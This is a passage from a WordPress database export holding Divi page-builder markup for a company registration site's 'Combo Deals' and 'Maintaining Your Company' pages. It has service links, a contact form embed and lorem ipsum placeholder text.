inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Combo Deals</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Pellentesque in ipsum id orci porta dapibus. Vestibulum ac diam sit amet quam vehicula elementum sed sit amet dui. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.26.6\" custom_padding=\"0px|||||\" custom_margin=\"-106px||||false|false\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>The Benefits Of Combo Deals.</h2>[/et_pb_text][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus.</p>\n<p>&nbsp;</p>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Basic Bundle\" use_icon=\"on\" font_icon=\"%%69%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_blur=\"22px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" box_shadow_spread=\"19px\" link_option_url=\"https://companyregistration.online/shop/combo-deals/basic-bundle/\"][/et_pb_blurb][et_pb_blurb title=\"Tender Ready\" use_icon=\"on\" font_icon=\"%%69%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_blur=\"22px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" box_shadow_spread=\"19px\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" link_option_url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Gold Bundle\" use_icon=\"on\" font_icon=\"%%69%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_blur=\"22px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" box_shadow_spread=\"19px\" link_option_url=\"https://companyregistration.online/shop/combo-deals/gold-bundle/\" url=\"https://companyregistration.online/shop/combo-deals/gold-bundle/\"][/et_pb_blurb][et_pb_blurb title=\"Business Pro\" use_icon=\"on\" font_icon=\"%%69%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_blur=\"22px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" box_shadow_spread=\"19px\" url=\"https://companyregistration.online/shop/combo-deals/business-pro/\" link_option_url=\"https://companyregistration.online/shop/combo-deals/business-pro/\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Combo Deals','','publish','closed','closed','','combo-deals-2','','','2019-08-19 09:19:11','2019-08-19 07:19:11','',0,'https://companyregistration.online/?page_id=32864',0,'page','',0),(32865,3,'2019-08-16 09:54:30','2019-08-16 07:54:30','<!-- wp:divi/placeholder /-->','Combo Deals','','inherit','closed','closed','','32864-revision-v1','','','2019-08-16 09:54:30','2019-08-16 07:54:30','',32864,'https://companyregistration.online/32864-revision-v1/',0,'revision','',0);
INSERT INTO `wpxb_posts` VALUES (32863,3,'2019-08-16 09:51:25','2019-08-16 07:51:25','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Maintaining Your Company</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Why should you maintain your company?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus. </p>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictu</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Annual Returns\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/annual-returns/\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In Closed Corporation Members\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-members/\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In Company  Address\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-company-address/\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Company Register\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/company-register-2/\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Change In Directors\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-directors/\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In Closed Corporation Address\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-close-corporation-address/\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Company and Closed Corporation Restoration\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/company-and-close-corporations-restorations/\" locked=\"off\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Build For the All of the Biggest  Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text 